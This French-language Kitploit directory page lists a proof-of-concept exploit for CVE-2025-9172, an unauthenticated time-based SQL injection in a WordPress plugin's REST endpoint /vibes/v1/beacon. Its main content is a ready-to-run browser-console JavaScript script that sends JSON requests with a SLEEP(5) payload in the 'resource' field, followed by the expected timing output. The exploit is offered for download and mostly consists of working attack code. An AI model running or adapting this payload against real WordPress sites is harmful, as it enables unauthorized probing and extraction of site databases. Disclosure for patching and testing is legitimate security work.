Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9172 — Preuve de concept d'exploit pour une vulnérabilité d'injection SQL temporelle non authentifiée dans le point de terminaison REST /vibes/v1/beacon de WordPress, avec une preuve de concept (PoC) dans la console du navigateur démontrant une injection basée sur SLEEP. | Kitploit
Outils/GitHubGitHub/jfriedli/cve-2025-9172
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjfriedli/cve-2025-9172

CVE-2025-9172

Preuve de concept d'exploit pour une vulnérabilité d'injection SQL temporelle non authentifiée dans le point de terminaison REST /vibes/v1/beacon de WordPress, avec une preuve de concept (PoC) dans la console du navigateur démontrant une injection basée sur SLEEP.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit : Injection SQL basée sur le temps via /vibes/v1/beacon (non authentifié)

Preuve de concept dans la console du navigateur

root@kitploit:~
(async () => {
  const url = 'http://localhost/wordpress/index.php?rest_route=/vibes/v1/beacon';

  async function send(resource) {
    const body = {
      type: 'navigation',
      resource, // injected into SQL (unprepared)
      authenticated: 0,
      metrics: [{ name: 'wait', start: 1, duration: 1 }]
    };

    const t0 = performance.now();

    const res = await fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(body)
    });

    await res.text();

    return {
      status: res.status,
      ms: Math.round(performance.now() - t0)
    };
  }

  console.log('Baseline (fast)…');
  console.log(await send('/a/b/c')); // expected: ~20–50ms

  console.log('Injected (time-based)…');
  console.log(await send("/a/b/c' OR SLEEP(5) OR 'x/dummy")); // expected: ~5000ms
})();

Résultat attendu

root@kitploit:~
Baseline: { status: 202, ms: ~20–50 }
Injected: { status: 202, ms: ~5000+ }
Télécharger l’outil